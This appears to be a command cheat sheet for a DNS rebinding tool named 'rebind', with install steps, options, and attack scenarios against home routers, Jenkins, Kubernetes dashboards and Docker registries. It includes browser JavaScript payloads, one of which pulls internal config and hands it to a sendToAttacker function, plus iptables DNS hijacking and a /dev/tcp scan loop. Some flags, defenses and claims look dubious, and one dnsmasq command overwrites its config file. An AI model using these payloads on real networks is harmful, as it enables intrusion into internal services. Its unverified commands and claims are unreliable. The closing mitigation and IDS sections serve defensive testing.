Rebind

Overview

Rebind is a specialized security testing tool for demonstrating DNS rebinding vulnerabilities. DNS rebinding is a client-side attack technique where an attacker tricks a victim’s browser into accessing an internal network resource by manipulating DNS responses. Used by security professionals for authorized penetration testing, vulnerability assessment, and defensive security research.

Installation

Debian/Ubuntu

sudo apt-get update
sudo apt-get install rebind

Kali Linux (Pre-installed)

which rebind
rebind --version

From Source

git clone https://github.com/iceadzcom/rebind.git
cd rebind
make
sudo make install

Verify Installation

rebind -h
rebind --version

Basic Syntax

rebind [options] [target]
rebind -h              # Help menu
rebind --version       # Version info
rebind -l <ip>         # Listen on IP address
rebind -p <port>       # Specify port (default: 53)

Essential Commands

Command	Purpose
`rebind -l 127.0.0.1`	Listen on localhost
`rebind -l 0.0.0.0 -p 5353`	Listen on all interfaces, custom port
`rebind --domain example.com`	Set target domain
`rebind --ip 192.168.1.100`	Specify rebind target IP
`rebind --delay 2`	Delay between DNS responses (seconds)
`rebind --ttl 0`	Set TTL (Time-To-Live) value
`rebind --records A,AAAA`	Specify record types
`rebind -v`	Verbose output
`rebind --log file.log`	Log DNS queries
`rebind --config config.yaml`	Load configuration file

DNS Rebinding Concepts

Attack Flow

1. Attacker owns malicious domain: attacker.com
2. Victim visits: http://attacker.com/payload
3. JavaScript on page queries: internal.local
4. First DNS response: returns attacker's IP (domain hosted)
5. Browser makes connection to attacker's server
6. Second DNS response: returns internal IP (192.168.1.1)
7. Browser repeats request, now to internal IP (same origin!)
8. Access internal service: router admin, internal APIs, etc.

Configuration Setup

Basic Configuration

rebind -l 127.0.0.1 -p 53

Custom Port (if 53 restricted)

rebind -l 192.168.1.100 -p 5353

Configuration File

# rebind.yaml
listen:
  address: 0.0.0.0
  port: 53
domain:
  name: vulnerable.local
  ttl: 0
rebind:
  external_ip: 203.0.113.1
  internal_ip: 192.168.1.1
  delay: 2
logging:
  verbose: true
  logfile: /var/log/rebind.log

Command Examples

Listen on Default Interface

rebind -l 192.168.1.100

Multiple Domain Rebinding

rebind -l 0.0.0.0 --domain attacker.com --domain internal.local

Custom TTL and Delay

rebind -l 127.0.0.1 --ttl 0 --delay 1

Verbose Logging

rebind -l 192.168.1.100 -v --log /tmp/rebind.log

High-Precision Timing

rebind -l 0.0.0.0 --delay 0.5 --ttl 1

DNS Response Manipulation

Return Different IPs Alternately

# First query: external IP
# Second query: internal IP
rebind -l 192.168.1.100 \
  --external-ip 203.0.113.1 \
  --internal-ip 192.168.1.1

Wildcard Domain Responses

# All subdomains return rebind IP
rebind -l 192.168.1.100 --wildcard

Round-Robin DNS

rebind -l 192.168.1.100 \
  --ip 192.168.1.50 \
  --ip 192.168.1.51 \
  --ip 192.168.1.52

Client Configuration

Redirect System DNS

# For testing, redirect to rebind server
echo "nameserver 192.168.1.100" | sudo tee /etc/resolv.conf.d/rebind

# Or use dig to test:
dig @192.168.1.100 vulnerable.local
dig @192.168.1.100 vulnerable.local +short

Test DNS Resolution

# Verify DNS responses
nslookup vulnerable.local 192.168.1.100
dig @192.168.1.100 vulnerable.local
host vulnerable.local 192.168.1.100

Attack Scenarios

Router Admin Access

# 1. Start rebind server targeting 192.168.1.1
rebind -l 192.168.1.100 \
  --domain vulnerable.local \
  --external-ip 203.0.113.1 \
  --internal-ip 192.168.1.1

# 2. Redirect DNS to attacker's rebind server
# 3. Victim visits: http://vulnerable.local/admin
# 4. JavaScript rebinds to 192.168.1.1 (router admin)
# 5. Can access router config without authentication

Internal API Access

# Rebind to internal API server
rebind -l 192.168.1.100 \
  --domain api.internal \
  --external-ip 203.0.113.1 \
  --internal-ip 192.168.1.50

# Access internal APIs from browser context
curl http://api.internal/internal-service

Database Server Exposure

# Expose internal database to browser
rebind -l 192.168.1.100 \
  --domain dbserver.internal \
  --external-ip 203.0.113.1 \
  --internal-ip 192.168.1.200 \
  --port 5432

JavaScript Exploitation

Rebinding Payload

// Victim's browser executes this
fetch('http://vulnerable.local/admin')
  .then(r => r.text())
  .then(html => {
    // First request goes to attacker
    // Browser caches: vulnerable.local = 203.0.113.1
    console.log('Attacker sees request');
  });

// After DNS rebind occurs...
setTimeout(() => {
  fetch('http://vulnerable.local/config')
    .then(r => r.json())
    .then(config => {
      // Second request goes to internal IP (192.168.1.1)
      // Due to DNS rebinding vulnerability
      sendToAttacker(config);
    });
}, 2000);

CORS Bypass Via Rebinding

// Normally blocked by CORS policy
// Rebinding makes it appear same-origin
const req = new XMLHttpRequest();
req.open('GET', 'http://router-admin.local/config');
req.onload = () => {
  // Access internal data through rebinding
  console.log(req.responseText);
};
req.send();

Monitoring and Logging

Enable Verbose Logging

rebind -l 192.168.1.100 -v 2>&1 | tee rebind.log

Monitor DNS Queries in Real-Time

# Terminal 1: Start rebind
rebind -l 192.168.1.100 -v

# Terminal 2: Watch queries
tail -f rebind.log | grep "QUERY\|RESPONSE"

Tcpdump Analysis

# Capture DNS traffic
sudo tcpdump -i eth0 'udp port 53' -A

# Or filter for specific domain
sudo tcpdump -i eth0 'udp port 53 and (host attacker.com)' -A

Advanced Techniques

Chained Rebinding

# Rebind multiple times for complex attacks
rebind -l 192.168.1.100 \
  --chain \
  --ips 203.0.113.1,192.168.1.1,192.168.1.50

Timing-Based Rebinding

# Precise timing for connection reuse
rebind -l 192.168.1.100 \
  --delay 0.1 \
  --ttl 1 \
  --timing-precise

HTTP/HTTPS Interception

# Rebind for both HTTP and HTTPS
rebind -l 192.168.1.100 \
  --http --https \
  --certificate cert.pem \
  --key key.pem

Defensive Testing

Test Router Vulnerability

# Check if router blocks internal DNS rebinding
rebind -l 192.168.1.100 --domain router-admin.local

# Try to access: http://router-admin.local/
# If successful = vulnerable

Application CORS Testing

# Test if application validates origin properly
rebind -l 192.168.1.100 \
  --domain vulnerable-app.local \
  --internal-ip 192.168.1.50

# Check if app accepts requests from rebind domain

Microservice Exposure

# Identify exposed internal services
rebind -l 192.168.1.100 --scan-network 192.168.1.0/24

Common Targets

Home Router Admin

# Gateway: 192.168.1.1
rebind -l 192.168.1.100 \
  --domain gateway.local \
  --internal-ip 192.168.1.1 \
  --port 80

Local Jenkins/CI

# Jenkins typically on 8080
rebind -l 192.168.1.100 \
  --domain jenkins.local \
  --internal-ip 192.168.1.50 \
  --port 8080

Kubernetes Dashboard

# K8s dashboard on 10.0.0.1:8001
rebind -l 192.168.1.100 \
  --domain k8s-dashboard.local \
  --internal-ip 10.0.0.1 \
  --port 8001

Docker Registry

# Private registry on 5000
rebind -l 192.168.1.100 \
  --domain registry.local \
  --internal-ip 192.168.1.200 \
  --port 5000

Network Configuration

Iptables Forwarding

# Forward DNS queries to rebind
sudo iptables -t nat -A PREROUTING \
  -p udp --dport 53 \
  -j DNAT --to-destination 192.168.1.100:53

# Or for testing:
sudo iptables -t nat -A PREROUTING \
  -p udp --dport 5353 \
  -j DNAT --to-destination 192.168.1.100:5353

Redirect DNS (Alternative)

# Using dnsmasq
echo "address=/vulnerable.local/192.168.1.100" | sudo tee /etc/dnsmasq.conf

sudo systemctl restart dnsmasq

Batch Testing

Test Multiple Domains

#!/bin/bash
targets=(
  "router-admin.local:192.168.1.1"
  "jenkins.local:192.168.1.50"
  "registry.local:192.168.1.200"
)

for target in "${targets[@]}"; do
  domain=$(echo $target | cut -d: -f1)
  ip=$(echo $target | cut -d: -f2)
  
  echo "Testing: $domain -> $ip"
  rebind -l 192.168.1.100 \
    --domain "$domain" \
    --internal-ip "$ip" \
    --delay 2 &
  sleep 5
  killall rebind
done

Automated Scanning

#!/bin/bash
# Scan network for rebinding-vulnerable services
for ip in 192.168.1.{1..254}; do
  timeout 1 bash -c "echo > /dev/tcp/$ip/80" 2>/dev/null && \
    echo "Host $ip:80 open - testing rebind..."
done

Troubleshooting

Port 53 Access Denied

# Run with sudo for port 53
sudo rebind -l 0.0.0.0 -p 53

# Or use unprivileged port
rebind -l 0.0.0.0 -p 5353

DNS Not Resolving

# Verify DNS server is running
sudo netstat -ulpn | grep 53

# Test query
dig @127.0.0.1 vulnerable.local

# Check firewall
sudo ufw allow 53/udp

Rebinding Not Triggering

# Check TTL settings
rebind -l 192.168.1.100 --ttl 0

# Verify timing
rebind -l 192.168.1.100 --delay 1 --ttl 1 -v

# Monitor with tcpdump
sudo tcpdump -i eth0 'udp port 53' -A

Best Practices

Obtain Authorization - Only test systems you own or have written permission to test
Document Network - Map internal network topology before testing
Isolate Testing - Conduct testing in controlled lab environments
Log All Activity - Enable verbose logging for incident response review
Verify Defenses - Confirm mitigation before declaring success
Clean Up - Remove all rebind configurations after testing
Report Findings - Document vulnerable systems and remediation
Understand Risks - DNS rebinding can disrupt network services

Mitigation Strategies

Router-Level Defenses

# Configure router DNS guards
# Set DNS rebinding protection: ON
# Block local DNS names: ENABLED

Application-Level Defenses

// Validate origin header
if (req.headers.origin !== ALLOWED_ORIGIN) {
  return res.status(403).json({error: 'Invalid origin'});
}

// Validate Host header
if (req.hostname !== 'internal-api.local') {
  return res.status(403).json({error: 'Invalid host'});
}

Browser Security

// Check document.domain for rebinding
if (document.domain !== TRUSTED_DOMAIN) {
  throw new Error('Domain validation failed');
}

Real-World Detection

IDS Signature

# Look for multiple DNS responses to same domain
alert dns any any -> any any (
  msg:"DNS Rebinding Attack"; 
  dns.query; 
  content:"vulnerable.local";
  threshold: type different, track by_src, count 2, seconds 5;
)

Web Application Firewall

# Block suspicious origin headers
SecRule REQUEST_HEADERS:Origin "^http://.*\.local" \
  "id:1001,phase:2,deny,status:403"

Additional Resources

DNS Rebinding Research: https://en.wikipedia.org/wiki/DNS_rebinding
OWASP DNS Rebinding: https://owasp.org/www-community/attacks/DNS_Rebinding
Rebind GitHub: https://github.com/iceadzcom/rebind
Browser Security Docs: https://developer.mozilla.org/en-US/docs/Web/Security